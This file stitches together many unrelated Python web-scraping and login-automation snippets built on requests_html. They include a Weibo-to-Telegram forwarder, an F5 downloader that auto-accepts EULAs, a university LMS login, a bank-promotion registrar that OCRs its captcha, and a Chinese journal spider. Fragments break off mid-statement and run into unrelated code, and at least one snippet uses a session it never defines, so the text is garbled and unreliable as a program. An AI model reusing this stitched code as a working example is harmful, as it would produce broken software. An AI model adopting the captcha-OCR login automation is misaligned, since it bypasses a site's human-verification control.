def get_hero_stats():
    hero_stats = []
    session = HTMLSession()
    res = session.post(hero_stats_url(), data={'event[]': 86, 'teamcompTypes': 1})
    player_heros = []
    team_heros = []
    # keys = ['gameNumber', 'roundtype', 'player', 'team', 'hero',
    #         'timePlayed', 'matchID', 'playerPic', 'playerName', 'teamPic',
    #         'nameCSFriendly', 'map', 'teamName']
    for result in res.html.search_all("heroStatsArr.concat({})"):
        player_heros += json.loads(result[0])
    # keys = ['gameNumber', 'roundtype', 'team', 'tcString',
    #         'gameWasPlayed', 'map', 'maptype', 'timePlayed', 'matchID']
    for result in res.html.search_all("teamcompsArr.concat({})"):
        team_heros += json.loads(result[0])
    write_json('stats/player_heros.json', player_heros)
    write_json('stats/team_heros.json', team_heros)
r = session.get('https://learn.uwaterloo.ca/d2l/login?&noredirect=1')
user = input('WatIAm ID: ')
pw = getpass()
payload = {
    'noredirect': 1,
    'loginPath': '/d2l/login',
    'UserName': user,
    'Password': pw,
}
# Log in via a session; the required values are sent in headers from here on.
r = session.post('https://learn.uwaterloo.ca/d2l/lp/auth/login/login.d2l',
                 data=payload, allow_redirects=False)
# sessionVals = r.cookies.get_dict()

# Go to the home page
r = session.get('https://learn.uwaterloo.ca/d2l/home')
soup = BeautifulSoup(r.content, 'html.parser')

# Find the term ID, which is needed to look up this term's courses.
# The 'calendar' URL happens to end with that term ID.
calendarURL = soup.find('a', href=lambda href: href and 'calendar' in href)
termID = calendarURL.get('href').split('/')[-1]

# Parse the courses data
courses = session.get(
def make_request(self):
    session = HTMLSession()
    response = session.post(BaseRequest.BASE_URL, data=self.params())
    return response
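# A minimal usage sketch, not from the original source: BaseRequest is assumed
# to define BASE_URL as a class attribute and leave params() to subclasses, so
# a hypothetical subclass only needs to supply the POST form fields:
class SearchRequest(BaseRequest):
    def __init__(self, query):
        self.query = query

    def params(self):
        # Field name 'q' is an illustrative assumption, not from the source.
        return {'q': self.query}

# response = SearchRequest('hello').make_request()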
class Weibo:
    def __init__(self):
        self.BASE_DIR = os.path.split(os.path.realpath(__file__))[0]
        config = configparser.ConfigParser()
        config.read(os.path.join(self.BASE_DIR, 'config.ini'), encoding='utf-8')
        self.WEIBO_ID = config.get("CONFIG", "WEIBO_ID")
        self.TELEGRAM_BOT_TOKEN = config.get("CONFIG", "TELEGRAM_BOT_TOKEN")
        self.TELEGRAM_CHAT_ID = config.get("CONFIG", "TELEGRAM_CHAT_ID")
        self.SESSION = HTMLSession()
        self.SESSION.adapters.DEFAULT_RETRIES = 5  # raise the retry count
        self.SESSION.keep_alive = False  # drop idle connections
        proxy = config.get("CONFIG", "PROXY")
        self.PROXIES = {"http": proxy, "https": proxy}

    def send_telegram_message(self, text, weibo_link):
        """Send a text message to Telegram."""
        headers = {'Content-Type': 'application/json'}
        data = f'{{"chat_id":"{self.TELEGRAM_CHAT_ID}", "text":"{text}", "reply_markup": {{"inline_keyboard":' \
               f' [[{{"text":"🔗点击查看原微博", "url":"{weibo_link}"}}]]}}}}'
        url = f'https://api.telegram.org/bot{self.TELEGRAM_BOT_TOKEN}/sendMessage'
        try:
            self.SESSION.post(url, headers=headers, data=data.encode('utf-8'),
                              proxies=self.PROXIES)
        except Exception:
            print(' |-网络代理错误,请检查确认后关闭本程序重试')
            time.sleep(99999)

    def send_telegram_photo(self, img_url):
        """Send a photo to Telegram."""
        url = f'https://api.telegram.org/bot{self.TELEGRAM_BOT_TOKEN}/sendPhoto'
        data = dict(chat_id=self.TELEGRAM_CHAT_ID, photo=img_url)
        self.SESSION.post(url, data=data, proxies=self.PROXIES)

    def parse_weibo(self, weibo):
        """Check whether this post was already handled; if not, push the text
        and any attached images to Telegram."""
        conn = sqlite3.connect(os.path.join(self.BASE_DIR, 'db', 'weibo.db'))
        cursor = conn.cursor()
        sql = "SELECT COUNT(id) AS counts FROM weibo WHERE link = ?"
        cursor.execute(sql, (weibo['link'],))
        result = cursor.fetchone()
        if result[0] <= 0:
            self.send_telegram_message(
                '{}{}'.format(
                    f"[{len(weibo['pics'])}图] " if weibo['pics'] else '',
                    weibo['title'],
                ),
                weibo['link']
            )
            # Push the image URLs to Telegram first so the post arrives immediately.
            for pic in weibo['pics']:
                self.send_telegram_photo(pic)
            # After the images reach Telegram, keep a local copy of each one.
            for pic in weibo['pics']:
                filename = pic[pic.rfind('/') + 1:]
                filename = os.path.join(self.BASE_DIR, 'images', filename)
                wget.download(pic, out=filename)
            sql = "INSERT INTO weibo(summary, link) VALUES(?, ?)"
            cursor.execute(sql, (weibo['title'], weibo['link']))
            conn.commit()
            conn.close()
            return True
        else:
            return False

    def test(self):
        print('* 正在检查微博ID是否配置正确')
        url = f'https://m.weibo.cn/api/container/getIndex?containerid=100505{self.WEIBO_ID}'
        try:
            weibo_name = self.SESSION.get(url).json()['data']['userInfo']['screen_name']
            print(f'【正确】当前设置的微博账户为:@{weibo_name}')
        except Exception:
            print('【错误】请重新测试或检查微博数字ID是否正确')
        print('\n* 正在检查代理是否配置正确')
        try:
            status_code = self.SESSION.get('https://www.google.com',
                                           proxies=self.PROXIES,
                                           timeout=5).status_code
            if status_code == 200:
                print('【正确】代理配置正确,可正常访问')
            else:
                print('【错误】代理无法访问到电报服务器')
        except Exception:
            print('【错误】代理无法访问到电报服务器')

    def run(self):
        print(time.strftime('%Y-%m-%d %H:%M:%S 执行完毕', time.localtime()))
        url = f'https://m.weibo.cn/api/container/getIndex?containerid=107603{self.WEIBO_ID}'
        try:
            weibo_items = self.SESSION.get(url).json()['data']['cards'][::-1]
        except Exception:
            print(' |-访问url出错了')
            return
        for item in weibo_items:
            weibo = {}
            weibo['title'] = BeautifulSoup(
                item['mblog']['text'].replace('<br />', '\n'),
                'html.parser').get_text()
            if item['mblog'].get('weibo_position') == 3:
                # Position 3 marks a retweet (1 is an original post); append the retweet chain.
                retweet = item['mblog']['retweeted_status']
                try:
                    weibo['title'] = f"{weibo['title']}//@{retweet['user']['screen_name']}:{retweet['raw_text']}"
                except Exception:
                    weibo['title'] = f"{weibo['title']}//转发原文不可见,可能已被删除"
            try:
                weibo['pics'] = [pic['large']['url'] for pic in item['mblog']['pics']]
            except Exception:
                weibo['pics'] = []
            short_url = item['scheme']
            short_url = short_url[short_url.rindex('/') + 1:short_url.index('?')]
            weibo['link'] = f'https://weibo.com/{self.WEIBO_ID}/{short_url}'
            self.parse_weibo(weibo)
from requests_html import HTMLSession

browser = HTMLSession()
data_login = {'account': '*****@*****.**', 'password': '******'}
url_login_api = 'https://api.mtdhb.org/user/login'
r = browser.post(url_login_api, data=data_login)
print(r.json()['code'])
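# A hedged follow-up sketch: the session keeps cookies between calls, and the
# login response is assumed (as in the QQ-bot snippet further down, which uses
# the same API) to carry a token under data.token that later endpoints expect
# in an X-User-Token header.
if r.json()['code'] == 0:
    token = r.json()['data']['token']
    r2 = browser.get('https://api.mtdhb.org/user/number',
                     headers={'X-User-Token': token})
    print(r2.json())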
class F5Downloads:
    def __init__(self, username, password, default_location='IRELAND'):
        self.username = username
        self.password = password
        self.default_location = default_location
        self._session = None
        self._version_pages = None
        self.new_files = []

    @property
    def session(self):
        if not self._session:
            self._session = HTMLSession()
            self._session.post(
                'https://api-u.f5.com/auth/pub/sso/login/user',
                headers={'Content-Type': 'application/x-www-form-urlencoded'},
                data={
                    'userid': self.username,
                    'passwd': self.password,
                })
        return self._session

    def find_links(self, page, pattern):
        return [(l.text, next(iter(l.absolute_links)))
                for l in page.html.find('a')
                if l.text and l.absolute_links and re.match(pattern, l.text)]

    def follow_specific_link(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']
        matching_links = self.find_links(page, pattern)
        # To proceed in the chain we need exactly one match
        if len(matching_links) != 1:
            logger.error(
                f'Found {len(matching_links)} matches for url {page.url} and pattern {pattern}, unable to proceed')
            logger.error('Files found:')
            logger.error(matching_links)
            raise Exception(f'Expected exactly one link matching {pattern}')
        name, url = matching_links[0]
        logger.debug(f'Following {name} with {url}')
        return self.get_page(url)

    def pick_latest_version(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']
        matching_links = self.find_links(page, pattern)
        if not len(matching_links):
            raise Exception(
                f'No versions matching {pattern} found on page {page}')
        versionDict = {}
        # This is an ugly one. Treat each version as a decimal number by
        # stripping the dots, then pick the numerically highest one.
        for version, url in matching_links:
            number = version.replace('.', '')
            versionDict[number] = (version, url)
        # Pick the highest number
        version, url = versionDict[max(versionDict, key=int)]
        logger.debug(f'Picking {version} as latest version')
        return self.get_page(url)

    def follow_path(self, page, steps):
        step = steps.pop(0)
        f = step['f']
        args = step['args']
        args['page'] = page
        result = f(**args)
        if not len(steps):
            return result
        elif result:
            return self.follow_path(result, steps)

    # Detect if the EULA exists and circle around it
    def get_page(self, url):
        page = self.session.get(url)
        if len(page.html.find('input#accept-eula')):
            logger.debug('EULA encountered, accepting it')
            page = self.session.get(
                url.replace('https://downloads.f5.com/esd/ecc.sv',
                            'https://downloads.f5.com/esd/eula.sv'))
        return page

    def download_files(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']
        download_folder = kwargs['download_folder']
        cb = kwargs['cb']
        # Create folders if needed
        pathlib.Path(download_folder).mkdir(parents=True, exist_ok=True)
        matching_links = self.find_links(page, pattern)
        for name, url in matching_links:
            md5_name, md5_url = next(
                iter(self.find_links(page, rf'^{name}.md5$')), (None, None))
            # Only download if there's a matching md5 file
            if not md5_name:
                raise Exception(f'No matching md5 file found for {name}')
            file_path = f'{download_folder}{name}'
            md5_path = f'{download_folder}{md5_name}'
            self.download_file(md5_path, md5_url)
            if self.md5_sum_ok(md5_path, file_path):
                logger.info('The newest file already exists on disk')
                return file_path
            else:
                self.download_file(file_path, url)
                logger.info(f'Validating {name} against the supplied md5')
                if self.md5_sum_ok(md5_path, f'{download_folder}{name}'):
                    logger.info('Downloaded file successfully')
                    if cb:
                        cb(file_path)
                    return file_path
                else:
                    raise Exception(f'Failed to download file {name}')

    def md5_sum_ok(self, md5_file, file):
        if not os.path.exists(md5_file):
            raise Exception(f'{md5_file} does not exist')
        if not os.path.exists(file):
            logger.info(f'{file} does not exist')
            return False
        with open(md5_file, 'r') as f:
            md5sum = re.sub(r' .+\n$', '', f.read())
        file_sum = self.md5(file)
        return md5sum == file_sum

    def md5(self, file_name):
        hash_md5 = hashlib.md5()
        with open(file_name, "rb") as f:
            for chunk in iter(lambda: f.read(4096), b""):
                hash_md5.update(chunk)
        return hash_md5.hexdigest()

    def download_file(self, file_path, url):
        if os.path.exists(file_path):
            os.remove(file_path)
        page = self.get_page(url)
        name, download_url = next(
            iter(self.find_links(page, rf'{self.default_location}')),
            (None, None))
        if download_url:
            logger.debug(f'Saving file as ./{file_path}')
            with self.session.get(download_url, stream=True) as r:
                r.raise_for_status()
                with open(file_path, 'wb') as f:
                    for chunk in r.iter_content(chunk_size=8192):
                        f.write(chunk)

    def download_geoipdb(self, version, cb=None):
        return self.follow_path(
            self.get_page('https://downloads.f5.com/esd/productlines.jsp'),
            [{
                'f': self.follow_specific_link,
                'args': {'pattern': rf'BIG-IP v{version}.x.+'},
            }, {
                'f': self.follow_specific_link,
                'args': {'pattern': r'GeoLocationUpdates'},
            }, {
                'f': self.download_files,
                'args': {
                    'pattern': rf'^ip-geolocation-.+\.zip$',
                    'download_folder': f'./downloads/GeoIP/v{version}/',
                    'cb': cb
                }
            }])

    def download_latest_version(self, version, cb=None):
        return self.follow_path(
            self.get_page('https://downloads.f5.com/esd/productlines.jsp'),
            [{
                'f': self.follow_specific_link,
                'args': {'pattern': rf'BIG-IP v{version}.x.+'},
            }, {
                'f': self.pick_latest_version,
                'args': {'pattern': rf'^{version}[\.0-9]+$'},
            }, {
                'f': self.download_files,
                'args': {
                    'pattern': rf'^BIGIP-{version}[\.0-9]+.+iso$',
                    'download_folder': f'./downloads/BIG-IP/v{version}/',
                    'cb': cb
                }
            }])
class ActivityHelper():
    def __init__(self, id):
        super().__init__()
        self.id = id
        self.session = HTMLSession()

    def get_captcha(self):
        # Fetch and OCR the captcha code
        ocr = CaptchaOCR(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/CodeController/kaptcha')
        return ocr.parse(), ocr.get_image_response()

    def login(self):
        code, response = self.get_captcha()
        self.cookie = response.cookies['SESSION']
        print('Cookie: %s' % self.cookie)
        data = {'verifyCode': code, 'cust_id': self.id, 'eventId': ''}
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/login',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie
        }
        r = self.session.post(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/checkVerifyCode',
            data=data, headers=headers)
        result = r.html.html
        if result in ('notPassCode', 'overLimit', 'noPass', 'errorFormat'):
            print("Error: ", result)

    def find_all(self):
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/login',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie
        }
        r = self.session.get(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/register/select',
            headers=headers)
        activities = r.html.find(
            '.form-item:not(.form-item-selected) input:checkbox[name="event-select"]')
        datas = []
        for item in activities:
            event_values = item.attrs['value'].split('_')
            datas.append({
                'eventId': event_values[0],
                'installmentEvent': event_values[1],
                'regEndDate': datetime.strptime(
                    event_values[2], '%a %b %d %H:%M:%S %Z %Y').strftime(
                    '%Y-%m-%dT%H:%M:%S.000+08:00')
            })
            print('Selected: %s' % datas)
            break
        return datas

    def select_all(self):
        datas = self.find_all()
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/register/select',
            'Content-Type': 'application/json; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie,
            'Accept': 'text/plain, */*; q=0.01'
        }
        r = self.session.post(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/register/save',
            data=json.dumps(datas), headers=headers)
        print('Result: %s' % (int(r.text) == len(datas)))

    def execute(self):
        self.login()
        self.select_all()
class ArrivaScraper:
    def __init__(self):
        self.url = "https://www.arriva.com.hr/en-us/choose-your-journey"
        self.session = HTMLSession()
        self.data = {
            "post-type": "shop",
            "currentstepnumber": "1",
            "search-from": None,
            "search-to": None,
            "search-datetime": None,
            "ticket-type": "oneway",
        }
        self.html = None
        self.cacher = CacheController()

    def run(self, source, destination, date):
        search = [source, destination, date]
        self.data["search-from"] = search[0]
        self.data["search-to"] = search[1]
        self.data["search-datetime"] = search[2]
        cached_data = self.cacher.getJourneys(search)
        if cached_data:
            return cached_data
        self.html = self.session.post(self.url, self.data).html
        return self.parseData(search)

    def parseData(self, search):
        dep = self.fetchDepartures()
        arr = self.fetchArrivals()
        dur = self.fetchDurations()
        pr = self.fetchPrices()
        carr = self.fetchCarriers()
        journeys = [
            Journey(
                source=search[0],
                destination=search[1],
                date=search[2],
                departure=dep[i] + " h",
                arrival=arr[i] + " h",
                duration=dur[i] + " h",
                price=pr[i],
                carrier=carr[i],
            )
            for i in range(len(dep))
        ]
        return self.cacher.cacheJourneys(journeys, search)

    def fetchDepartures(self):
        return [
            dep.find("strong")[0].text.split("-")[0][:-1]
            for dep in self.html.find(".vrijeme-top")
        ]

    def fetchArrivals(self):
        return [
            arr.find("strong")[0].text.split("-")[1][1:]
            for arr in self.html.find(".vrijeme-top")
        ]

    def fetchPrices(self):
        prices = [
            pr.find("a")[0].text.split(",")[0]
            for pr in self.html.find(".cijena")
            if pr.find("a") != []
        ]
        # `c` is assumed to be a module-level currency converter (HRK to the target currency).
        return [round(c.convert(int(ep), "HRK"), 2) for ep in prices]

    def fetchDurations(self):
        return [dur.text[16:] for dur in self.html.find(".vrijeme-bottom")]

    def fetchCarriers(self):
        return [carr.text[9:] for carr in self.html.find(".prijevoznik")]
from requests_html import HTMLSession

login_url1 = 'https://shibb-idp.georgetown.edu/idp/profile/SAML2/POST/SSO'
login_url2 = 'https://shibb-idp.georgetown.edu/idp/profile/SAML2/POST/SSO?execution=e1s1'
data = {'j_username': '******', 'j_password': '******'}
s = HTMLSession()
r = s.post(login_url1, data=data)
r.html.render()
r = s.post(login_url2, data=data)
print(r.status_code)
for i in r.cookies:
    print(i)
class CqvipSpider(object):
    def __init__(self):
        self.base_url = 'http://qikan.cqvip.com/Qikan/Search/Index?'
        self.main_url = 'http://qikan.cqvip.com'
        self.test_url = 'http://qikan.cqvip.com/Search/SearchList'
        self.session = HTMLSession()
        com = CommonSettings()
        self.headers = com.set_common_headers()
        # self.keyword = com.set_common_keyword()
        self.pagesize = com.set_common_pagesize()
        self.csvname = com.set_common_output()[1]

    @retry()
    def post(self, url, data):
        result = self.session.post(url, data=data, timeout=10)
        result.encoding = result.apparent_encoding
        return result

    def get_init_page(self, search_word):
        data = {
            'key': 'U=' + search_word,
            'isNoteHistory': '1',
            'isLog': '1',
            'indexKey': search_word,
            'indexIdentifier': 'U'
        }
        attempts = 0
        success = False
        while attempts < 100 and not success:
            try:
                result = self.post(self.base_url, data)
                print('status of init page is %s' % result)
                if result.status_code != 200:
                    attempts += 1
                    print('status.error')
                    print('第' + str(attempts) + '次重试!!')
                    if attempts == 100:
                        break
                else:
                    bsoj = BeautifulSoup(result.text, features='lxml')
                    total_count = bsoj.find('input', {'id': 'hidShowTotalCount'})['value']
                    page_count = math.ceil(int(total_count) / self.pagesize)
                    print('总页数为%s页' % page_count)
                    socket.setdefaulttimeout(10)  # connections time out after 10 seconds
                    success = True
                    return total_count, page_count
            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('init page callback: %s' % e)
                print('第' + str(attempts) + '次重试!!')
                if attempts == 100:
                    break

    def get_qikan_page(self, search_word):
        containers = []
        null = None  # Python's None stands in for null in the JS-style payload below
        total_count, page_count = self.get_init_page(search_word)
        breakpoint = 1
        attempts = 0
        success = False
        while attempts < 100 and not success:
            try:
                while breakpoint <= page_count:
                    container = []
                    print('正在爬取第%s页...' % breakpoint)
                    searchParamModel = json.dumps({
                        "ObjectType": 1, "SearchKeyList": [],
                        "SearchExpression": null, "BeginYear": null,
                        "EndYear": null, "UpdateTimeType": null,
                        "JournalRange": null, "DomainRange": null,
                        "ClusterFilter": "", "ClusterLimit": 0,
                        "ClusterUseType": "Article",
                        "UrlParam": "U=" + search_word,
                        "Sort": "0", "SortField": null, "UserID": "0",
                        "PageNum": breakpoint, "PageSize": self.pagesize,
                        "SType": null, "StrIds": null, "IsRefOrBy": 0,
                        "ShowRules": " 任意字段=" + search_word + " ",
                        "IsNoteHistory": 0, "AdvShowTitle": null,
                        "ObjectId": null, "ObjectSearchType": 0,
                        "ChineseEnglishExtend": 0, "SynonymExtend": 0,
                        "ShowTotalCount": int(total_count), "AdvTabGuid": ""
                    })
                    data = {'searchParamModel': searchParamModel}
                    result = self.post(self.test_url, data)
                    print('status of qikan page is %s' % result)
                    if result.status_code != 200:
                        attempts += 1
                        print('qikan.status.error')
                        print('第' + str(attempts) + '次重试!!')
                        if attempts == 100:
                            break
                    else:
                        soup = BeautifulSoup(result.text, features='lxml')
                        simple_div = soup.find('div', {'class': 'simple-list'})
                        dls = simple_div.findAll('dl')
                        for dl in dls:
                            field = {}
                            dt = dl.find('dt')
                            if dt.find('span', {'class': 'cited'}):
                                cited_span = dt.find('span', {'class': 'cited'})
                                cited = cited_span.find('a')['data-zkbycount']
                                field['cited'] = cited
                            else:
                                cited = '0'
                                field['cited'] = cited
                            download = self.main_url + dt.find('a')['href']
                            field['download'] = download
                            container.append(field)
                        containers.extend(container)
                        print('第%s页爬取结束!' % breakpoint)
                        breakpoint += 1
                        if breakpoint > page_count:
                            print('已爬取结束, 共%s页' % (breakpoint - 1))
                        else:
                            print('新断点记录为第%s页' % breakpoint)
                socket.setdefaulttimeout(10)  # connections time out after 10 seconds
                success = True
                return containers
            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('qikan page callback: %s' % e)
                print('第' + str(attempts) + '次重试!!')
                if attempts == 100:
                    break

    def get_detail_page(self, search_word):
        breakpoint = 0
        attempts = 0
        repos = []
        success = False
        containers = self.get_qikan_page(search_word)
        while attempts < 100 and not success:
            try:
                while breakpoint < len(containers):
                    repo = {}
                    cited = containers[breakpoint]['cited']
                    repo['cited'] = cited
                    download = containers[breakpoint]['download']
                    repo['download'] = download
                    print('正在爬取链接为:%s' % download)
                    abuyun = AbuyunProxy()
                    proxy_handler = abuyun.urllib_proxy_settings()[1]
                    opener = urllib.request.build_opener(proxy_handler)
                    urllib.request.install_opener(opener)
                    request = urllib.request.Request(download, headers=self.headers)
                    print('status of detail page is %s' % request)
                    html = urllib.request.urlopen(request, timeout=10).read()
                    soup = BeautifulSoup(html, 'lxml')
                    if soup.find('div', {'class': 'article-title'}):
                        title_div = soup.find('div', {'class': 'article-title'})
                        raw_title = title_div.find('h1').get_text()
                        raw_title1 = re.sub('预览', '', raw_title).strip().replace('\r', '').replace('\n', '')
                        title = re.sub('被引量.*', '', raw_title1).strip()
                        print(title)
                        repo['title'] = title
                    else:
                        title = 'N/A'
                        repo['title'] = title
                    article_div = soup.find('div', {'class': 'article-detail'})
                    abstract_div = article_div.find('div', {'class': 'abstract'})
                    if abstract_div.find('span', {'class': 'abstract'}):
                        abstract = abstract_div.find('span', {'class': 'abstract'}).get_text().replace('\r', '').replace('\n', '').strip('\'').replace(',', ',')
                        print(abstract)
                        repo['abstract'] = abstract
                    else:
                        abstract = 'N/A'
                        repo['abstract'] = abstract
                    author_div = article_div.find('div', {'class': 'author'})
                    if author_div.find('span'):
                        raw_author = author_div.findAll('span')[1].get_text().replace('\n', ';')
                        raw_author1 = re.sub('^;|;$', '', raw_author)
                        author = raw_author1.replace(';', ' ')
                        print(author)
                        repo['author'] = author
                    else:
                        author = 'N/A'
                        repo['author'] = author
                    if article_div.find('div', {'class': 'organ'}):
                        info_div = article_div.find('div', {'class': 'organ'})
                        if info_div.find('span'):
                            raw_info = info_div.findAll('span')[1].get_text().replace('\r', '').replace('\n', ';')
                            info = re.sub('^;|;$', '', raw_info)
                            print(info)
                            repo['info'] = info
                        else:
                            info = 'N/A'
                            repo['info'] = info
                    else:
                        info = 'N/A'
                        repo['info'] = info
                    if article_div.find('div', {'class': 'journal'}):
                        date_div = article_div.find('div', {'class': 'journal'})
                        if date_div.find('span', {'class': 'vol'}):
                            raw_date = date_div.find('span', {'class': 'vol'}).get_text().strip('\n').strip('\'').strip('').strip()
                            date = re.search('^.*年', raw_date).group()
                            print(date)
                            repo['date'] = date
                        else:
                            date = 'N/A'
                            repo['date'] = date
                    else:
                        date = 'N/A'
                        repo['date'] = date
                    source = '维普期刊'
                    repo['source'] = source
                    downed = '暂无'
                    repo['downed'] = downed
                    if article_div.find('div', {'class': 'fund'}):
                        fund_div = article_div.find('div', {'class': 'fund'})
                        funds = []
                        if fund_div.find('span'):
                            if len(fund_div.findAll('span')) > 2:
                                fund_span = fund_div.findAll('span')[1:]
                                for span in fund_span:
                                    fund_piece = span.get_text().replace('\r', '').replace('\n', '').strip()
                                    funds.append(fund_piece)
                                fund = ';'.join(funds)
                                print(fund)
                                repo['fund'] = fund
                            else:
                                fund = fund_div.findAll('span')[1].get_text().replace('\r', '').replace('\n', '').strip().replace(',', ',')
                                repo['fund'] = fund
                        else:
                            fund = 'N/A'
                            repo['fund'] = fund
                    else:
                        fund = 'N/A'
                        repo['fund'] = fund
                    if article_div.find('div', {'class': 'subject'}):
                        kws_div = article_div.find('div', {'class': 'subject'})
                        kwss = []
                        if kws_div.find('span'):
                            if len(kws_div.findAll('span')) > 2:
                                kws_span = kws_div.findAll('span')[1:]
                                for span in kws_span:
                                    kws_piece = span.get_text()
                                    kwss.append(kws_piece)
                                kws = ';'.join(kwss)
                                repo['kws'] = kws
                            else:
                                kws = kws_div.findAll('span')[1].get_text()
                                repo['kws'] = kws
                        else:
                            kws = 'N/A'
                            repo['kws'] = kws
                    else:
                        kws = 'N/A'
                        repo['kws'] = kws
                    repos.append(repo)
                    print('第%s篇论文爬取结束!' % breakpoint)
                    breakpoint += 1
                    if breakpoint == len(containers):
                        print('已爬取结束, 共%s页' % (breakpoint - 1))
                    else:
                        print('新断点记录为第%s页' % breakpoint)
                socket.setdefaulttimeout(10)  # connections time out after 10 seconds
                success = True
                print(repos)
                return repos
            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('detail page callback: %s' % e)
                print('第' + str(attempts) + '次重试!!')
                if attempts == 100:
                    break

    def save_data(self, search_word):
        try:
            csv_data = self.get_detail_page(search_word)
            sheet = pyexcel.Sheet()
            for data in csv_data:
                sheet.row += pyexcel.get_sheet(adict=data, transpose_after=True)
            sheet.colnames = ['title', 'author', 'source', 'info', 'date',
                              'kws', 'cited', 'downed', 'abstract', 'fund',
                              'download']
            print(sheet)
            sheet.save_as(self.csvname)
        except Exception as e:
            print('404 error!%s' % e)

    def pandas_save_data(self, search_word):
        try:
            csv_data = self.get_detail_page(search_word)
            dataframe = pd.DataFrame(csv_data)
            print(dataframe)
            dataframe.to_csv(self.csvname, index=False, sep=',', encoding='utf-8')
            print('data saved')
        except Exception as e:
            print('404 error!%s' % e)
from requests_html import HTMLSession
from Constants import *

session = HTMLSession()
session.post(loginUrl, loginInfo)


def get_verification_token(r):
    verification_token = r.html.find('input', first=True).attrs['value']
    return verification_token


def create_crises():
    r = session.get(createCrisesUrl)
    verification_token = get_verification_token(r)
    payload = create_crises_info(verification_token)
    return_action(CREATE, payload, createCrisesUrl)


def return_action(action, payload, url):
    session.post(url, data=payload, headers=headers)


def get_crises(properties):
    r = session.get(crisesListUrl)
    links = [x for x in r.html.absolute_links if properties in x]
    return links
class AnchorInfo(object):
    def __init__(self, env):
        self.url = 'http://www.darenji.com/search.html'
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
            'Referer': 'http://www.darenji.com/search.html',
        }
        self.env_dict = environments.get(env)
        self.r = redis.StrictRedis().from_url(url=self.env_dict.get('redis_url'))
        self.client = MongoClient(self.env_dict.get('mongodb_host'),
                                  port=self.env_dict.get('mongodb_port'))
        self.db = self.client['pltaobao']
        self.session = HTMLSession()

    def save_data(self, id, nickname, fansCount, anchorPhoto, houseId, descText):
        self.r.sadd('anchorId', str(id))
        self.r.sadd('anchorName', nickname)
        collection = self.db['anchor_info']
        res = collection.find_one({'anchorId': str(id)})
        if not res:
            data = {
                'anchorId': str(id),
                'anchorName': nickname,
                'houseId': int(houseId),
                'fansCount': int(fansCount),
                'liveCount': None,
                'city': None,
                'creatorType': None,
                'darenScore': None,
                'descText': descText,
                'anchorPhoto': anchorPhoto,
                'organId': None,
                'fansFeature': None,
                'historyData': None,
            }
            collection.insert_one(data)

    def get_data(self, anchor_name):
        try:
            rs = self.session.post(url=self.url, headers=self.headers,
                                   data={'conditions': anchor_name}, timeout=3)
        except Exception:
            return None
        find_count = rs.html.xpath('//*[@id="qcount"]/text()')[0]
        if find_count == '0':
            return None
        nick_list = rs.html.xpath('//*[@id="nickname"]/text()')
        anchorPhoto_list = rs.html.xpath('//*[@id="paginate"]/li/div/a/@style')
        fans_num = rs.html.xpath('//*[@id="paginate"]/li/div/div[1]/h1/span/text()')
        house_id = rs.html.xpath('//*[@id="paginate"]/li/div/div[1]/p/span/text()')
        desc_text = rs.html.xpath('//*[@id="paginate"]/li/div/div[2]/div[1]/p/text()')
        anchorId = None
        for index, nick in enumerate(nick_list):
            id = anchorPhoto_list[index].split('/')[5]
            nickname = nick_list[index].replace(' ', '').replace("\n", "")
            fansCount = fans_num[index].replace(' 粉丝数量:', '')
            anchorPhoto = anchorPhoto_list[index].replace(
                'background:url(', 'https:').replace(') no-repeat;', '')
            houseId = house_id[index]
            descText = desc_text[index].strip().replace("\n", "")
            print(id, nickname)
            if nickname == anchor_name:
                anchorId = id
                self.save_data(id, nickname, fansCount, anchorPhoto, houseId, descText)
                break
            # self.save_data(id, nickname, fansCount, anchorPhoto, houseId, descText)
        print(anchorId)
        return anchorId
class Bidding:
    def __init__(self, url, page):
        self.url = url
        self.loginurl = self.url + '/cblcn/member.login/login'
        self.yzmurl = self.url + '/cblcn/member.login/captcha'
        self.loginchkurl = self.url + '/cblcn/member.login/logincheck'
        self.page = page
        self.key_title1 = '风电'
        self.key_title2 = '风力'
        self.key_content = '风力发电机组'
        self.exp_list = [
            '询价', '施工', '维修', '维护', '运维', '改造', '接地', '海缆', '改建',
            '中标', '塔筒', '塔架', '基础', '法兰', '锚栓', '压站', '主轴', '主变',
            '箱变', '勘察', '设计', '滤芯', '螺栓', '电气', '线路', '道路', '监理',
            '备件', '吊装', '可研', '润滑', '配电', '装置', '检测', '检修', '监测',
            '监督', '测试', '测评', '试验', '变更', '更换', '技改', '验收', '安装',
            '分包', '电缆', '光缆', '材料', '箱式', '框架', '造价', '通信', '编码',
            '定检', '叶片', '倒运', '消防', '开关', '主体', '集控', '诊断', '齿轮',
            '柴油', '部件', '电池', '风扇', '充电', '故障', '消缺', '外委', '水土',
            '电容', '稳控', '变桨', '滑环', '打捆', '咨询', '测风', '电压', '电源',
            '电阻', '电梯', '模块', '网关', '数据', '驱动', '配件', '刹车', '升降',
            '防尘', '评估', '档案', '监控', '偏航', '标识', '土建', '振动', '仿真',
            '通讯', '液压', '雷电', '租赁', '端子', '紫铜', '蓄能', '加热', '控制',
            '接口', '导流', '变频', '工控', '继电器', '风速仪', '熔断器', '交换机',
            '集电环', '联轴器', '变压器', '变流器', '可行性', '启动', '滤网', '补偿',
